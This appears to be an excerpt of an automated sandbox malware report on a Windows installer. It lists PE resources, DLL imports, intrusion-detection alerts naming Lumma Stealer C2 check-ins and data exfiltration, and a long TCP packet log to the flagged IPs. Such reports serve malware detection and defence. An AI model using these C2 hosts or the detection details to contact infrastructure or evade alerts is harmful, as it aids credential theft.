RT_STRING | 0x116268 | 0x3e4 | data | 0.4347389558232932 | ||
RT_STRING | 0x11664c | 0x9c | data | 0.717948717948718 | ||
RT_STRING | 0x1166e8 | 0xe8 | data | 0.6293103448275862 | ||
RT_STRING | 0x1167d0 | 0x468 | data | 0.3820921985815603 | ||
RT_STRING | 0x116c38 | 0x38c | data | 0.3898678414096916 | ||
RT_STRING | 0x116fc4 | 0x3dc | data | 0.39271255060728744 | ||
RT_STRING | 0x1173a0 | 0x360 | data | 0.37037037037037035 | ||
RT_STRING | 0x117700 | 0x40c | data | 0.3783783783783784 | ||
RT_STRING | 0x117b0c | 0x108 | data | 0.5113636363636364 | ||
RT_STRING | 0x117c14 | 0xcc | data | 0.6029411764705882 | ||
RT_STRING | 0x117ce0 | 0x234 | data | 0.5070921985815603 | ||
RT_STRING | 0x117f14 | 0x3c8 | data | 0.3181818181818182 | ||
RT_STRING | 0x1182dc | 0x32c | data | 0.43349753694581283 | ||
RT_STRING | 0x118608 | 0x2a0 | data | 0.41964285714285715 | ||
RT_RCDATA | 0x1188a8 | 0x82e8 | data | English | United States | 0.11261637622344235 |
RT_RCDATA | 0x120b90 | 0x10 | data | 1.5 | ||
RT_RCDATA | 0x120ba0 | 0x1800 | PE32+ executable (console) x86-64, for MS Windows | English | United States | 0.3924153645833333 |
RT_RCDATA | 0x1223a0 | 0x6b0 | data | 0.6466121495327103 | ||
RT_RCDATA | 0x122a50 | 0x5b10 | PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows | English | United States | 0.3255404941660947 |
RT_RCDATA | 0x128560 | 0x125 | Delphi compiled form 'TMainForm' | 0.7508532423208191 | ||
RT_RCDATA | 0x128688 | 0x3a2 | Delphi compiled form 'TNewDiskForm' | 0.524731182795699 | ||
RT_RCDATA | 0x128a2c | 0x320 | Delphi compiled form 'TSelectFolderForm' | 0.53625 | ||
RT_RCDATA | 0x128d4c | 0x300 | Delphi compiled form 'TSelectLanguageForm' | 0.5703125 | ||
RT_RCDATA | 0x12904c | 0x5d9 | Delphi compiled form 'TUninstallProgressForm' | 0.4562458249832999 | ||
RT_RCDATA | 0x129628 | 0x461 | Delphi compiled form 'TUninstSharedFileForm' | 0.4335414808206958 | ||
RT_RCDATA | 0x129a8c | 0x2092 | Delphi compiled form 'TWizardForm' | 0.2299112497001679 | ||
RT_GROUP_CURSOR | 0x12bb20 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25 |
RT_GROUP_CURSOR | 0x12bb34 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25 |
RT_GROUP_CURSOR | 0x12bb48 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
RT_GROUP_CURSOR | 0x12bb5c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
RT_GROUP_CURSOR | 0x12bb70 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
RT_GROUP_CURSOR | 0x12bb84 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
RT_GROUP_CURSOR | 0x12bb98 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
RT_GROUP_ICON | 0x12bbac | 0x3e | data | English | United States | 0.8387096774193549 |
RT_VERSION | 0x12bbec | 0x15c | data | English | United States | 0.5689655172413793 |
RT_MANIFEST | 0x12bd48 | 0x62c | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4240506329113924 |
DLL | Import |
---|---|
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen |
advapi32.dll | RegQueryValueExW, RegOpenKeyExW, RegCloseKey |
user32.dll | GetKeyboardType, LoadStringW, MessageBoxA, CharNextW |
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryW, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCurrentDirectoryW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringW, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle |
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW |
user32.dll | CreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongW, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PtInRect, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OffsetRect, OemToCharBuffA, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, ExitWindowsEx, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, AppendMenuW, CharToOemBuffA, AdjustWindowRectEx, ActivateKeyboardLayout |
msimg32.dll | AlphaBlend |
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, RemoveFontResourceW, Rectangle, RectVisible, RealizePalette, Polyline, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LineDDA, IntersectClipRect, GetWindowOrgEx, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, Ellipse, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, Chord, BitBlt, Arc, AddFontResourceW |
version.dll | VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW |
mpr.dll | WNetOpenEnumW, WNetGetUniversalNameW, WNetGetConnectionW, WNetEnumResourceW, WNetCloseEnum |
kernel32.dll | lstrcpyW, lstrcmpW, WriteProfileStringW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualFree, VirtualAlloc, TransactNamedPipe, TerminateProcess, SwitchToThread, SizeofResource, SignalObjectAndWait, SetThreadLocale, SetNamedPipeHandleState, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, SetCurrentDirectoryW, ResumeThread, ResetEvent, RemoveDirectoryW, ReleaseMutex, ReadFile, QueryPerformanceCounter, OpenProcess, OpenMutexW, MultiByteToWideChar, MulDiv, MoveFileExW, MoveFileW, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryW, LeaveCriticalSection, IsDBCSLeadByte, IsBadWritePtr, InitializeCriticalSection, GlobalFindAtomW, GlobalDeleteAtom, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetTickCount, GetThreadLocale, GetSystemTimeAsFileTime, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetShortPathNameW, GetProfileStringW, GetProcAddress, GetPrivateProfileStringW, GetOverlappedResult, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryW, GetComputerNameW, GetCommandLineW, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FlushFileBuffers, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, EnumCalendarInfoW, EnterCriticalSection, DeviceIoControl, DeleteFileW, DeleteCriticalSection, CreateThread, CreateProcessW, CreateNamedPipeW, CreateMutexW, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringW, CompareFileTime, CloseHandle |
advapi32.dll | SetSecurityDescriptorDacl, RegSetValueExW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, InitializeSecurityDescriptor, GetUserNameW, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid |
comctl32.dll | InitCommonControls |
kernel32.dll | Sleep |
oleaut32.dll | GetErrorInfo, GetActiveObject, RegisterTypeLib, LoadTypeLib, SysFreeString |
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CLSIDFromProgID, CLSIDFromString, StringFromCLSID, CoCreateInstance, CoFreeUnusedLibraries, CoUninitialize, CoInitialize, IsEqualGUID |
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit |
comctl32.dll | InitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls |
shell32.dll | ShellExecuteExW, ShellExecuteW, SHGetFileInfoW, ExtractIconW |
shell32.dll | SHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHBrowseForFolderW |
comdlg32.dll | GetSaveFileNameW, GetOpenFileNameW |
ole32.dll | CoDisconnectObject |
advapi32.dll | AdjustTokenPrivileges |
oleaut32.dll | SysFreeString |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T14:37:11.659198+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49748 | 104.21.25.52 | 443 | TCP |
2025-01-07T14:37:12.141741+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49748 | 104.21.25.52 | 443 | TCP |
2025-01-07T14:37:12.141741+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49748 | 104.21.25.52 | 443 | TCP |
2025-01-07T14:37:12.609952+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49749 | 104.21.25.52 | 443 | TCP |
2025-01-07T14:37:13.061485+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49749 | 104.21.25.52 | 443 | TCP |
2025-01-07T14:37:13.061485+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49749 | 104.21.25.52 | 443 | TCP |
2025-01-07T14:37:13.913865+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49750 | 104.21.25.52 | 443 | TCP |
2025-01-07T14:37:15.152429+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49751 | 104.21.25.52 | 443 | TCP |
2025-01-07T14:37:16.395868+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49752 | 104.21.25.52 | 443 | TCP |
2025-01-07T14:37:22.773652+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49754 | 104.21.25.52 | 443 | TCP |
2025-01-07T14:37:24.415568+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49755 | 104.21.25.52 | 443 | TCP |
2025-01-07T14:37:24.859758+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49755 | 104.21.25.52 | 443 | TCP |
2025-01-07T14:37:26.047768+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49756 | 104.21.25.52 | 443 | TCP |
2025-01-07T14:37:26.052786+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.4 | 49756 | 104.21.25.52 | 443 | TCP |
2025-01-07T14:37:28.145395+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49757 | 104.21.25.52 | 443 | TCP |
2025-01-07T14:37:28.640242+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49757 | 104.21.25.52 | 443 | TCP |
2025-01-07T14:37:29.414835+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49758 | 185.161.251.21 | 443 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 7, 2025 14:37:11.168333054 CET | 49748 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:11.168380022 CET | 443 | 49748 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:11.168493032 CET | 49748 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:11.171468973 CET | 49748 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:11.171484947 CET | 443 | 49748 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:11.659068108 CET | 443 | 49748 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:11.659198046 CET | 49748 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:11.665258884 CET | 49748 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:11.665275097 CET | 443 | 49748 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:11.665540934 CET | 443 | 49748 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:11.713156939 CET | 49748 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:11.717955112 CET | 49748 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:11.717983007 CET | 49748 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:11.718099117 CET | 443 | 49748 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:12.141786098 CET | 443 | 49748 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:12.141906023 CET | 443 | 49748 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:12.142030001 CET | 49748 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:12.144071102 CET | 49748 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:12.144094944 CET | 443 | 49748 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:12.144115925 CET | 49748 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:12.144121885 CET | 443 | 49748 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:12.152410030 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:12.152465105 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:12.152559042 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:12.152854919 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:12.152864933 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:12.609733105 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:12.609951973 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:12.611422062 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:12.611443996 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:12.611681938 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:12.613076925 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:12.613126040 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:12.613157988 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.061485052 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.061542988 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.061582088 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.061611891 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:13.061619043 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.061650991 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.061671019 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:13.062031984 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.062088013 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:13.062098980 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.062314034 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.062350988 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.062364101 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:13.062371016 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.062459946 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:13.062467098 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.066183090 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.066243887 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:13.066251993 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.119429111 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:13.148682117 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.148752928 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.148781061 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.148864031 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:13.148886919 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.148935080 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:13.169214010 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.169333935 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.169403076 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:13.169619083 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:13.169636011 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.169660091 CET | 49749 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:13.169665098 CET | 443 | 49749 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.442698956 CET | 49750 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:13.442750931 CET | 443 | 49750 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.442848921 CET | 49750 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:13.443205118 CET | 49750 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:13.443212032 CET | 443 | 49750 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.913685083 CET | 443 | 49750 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.913865089 CET | 49750 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:13.915172100 CET | 49750 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:13.915182114 CET | 443 | 49750 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.915381908 CET | 443 | 49750 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.916640043 CET | 49750 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:13.916810036 CET | 49750 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:13.916826010 CET | 443 | 49750 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:13.916882992 CET | 49750 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:13.916887999 CET | 443 | 49750 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:14.520318985 CET | 443 | 49750 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:14.520423889 CET | 443 | 49750 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:14.520539999 CET | 49750 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:14.520746946 CET | 49750 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:14.520766973 CET | 443 | 49750 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:14.665724993 CET | 49751 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:14.665781975 CET | 443 | 49751 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:14.665882111 CET | 49751 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:14.666219950 CET | 49751 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:14.666227102 CET | 443 | 49751 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:15.152338028 CET | 443 | 49751 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:15.152429104 CET | 49751 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:15.153763056 CET | 49751 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:15.153775930 CET | 443 | 49751 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:15.154021978 CET | 443 | 49751 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:15.155183077 CET | 49751 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:15.155296087 CET | 49751 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:15.155339956 CET | 443 | 49751 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:15.629117966 CET | 443 | 49751 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:15.629216909 CET | 443 | 49751 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:15.629342079 CET | 49751 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:15.629659891 CET | 49751 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:15.629682064 CET | 443 | 49751 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:15.917972088 CET | 49752 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:15.918025017 CET | 443 | 49752 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:15.918101072 CET | 49752 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:15.918910027 CET | 49752 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:15.918926001 CET | 443 | 49752 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:16.395775080 CET | 443 | 49752 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:16.395868063 CET | 49752 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:16.397279978 CET | 49752 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:16.397290945 CET | 443 | 49752 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:16.397551060 CET | 443 | 49752 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:16.398639917 CET | 49752 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:16.398781061 CET | 49752 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:16.398811102 CET | 443 | 49752 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:16.398874044 CET | 49752 | 443 | 192.168.2.4 | 104.21.25.52 |
Jan 7, 2025 14:37:16.398881912 CET | 443 | 49752 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:21.788935900 CET | 443 | 49752 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:21.789031982 CET | 443 | 49752 | 104.21.25.52 | 192.168.2.4 |
Jan 7, 2025 14:37:21.789160967 CET | 49752 | 443 | 192.168.2.4 | 104.21.25.52 |
